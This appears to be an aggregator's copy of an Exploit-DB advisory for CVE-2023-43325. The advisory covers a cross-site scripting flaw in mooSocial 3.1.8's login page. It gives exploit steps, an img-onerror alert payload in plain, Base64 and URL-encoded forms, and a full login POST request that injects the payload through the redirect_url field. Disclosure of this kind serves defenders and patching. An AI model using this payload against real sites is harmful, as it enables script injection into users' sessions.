4
[webapps] mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
source link: https://www.exploit-db.com/exploits/51766
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325
Description:
A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.
Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
test"><img src=a onerror=alert(1)>test
Payload (Base64 encoded) :
dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded):
dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK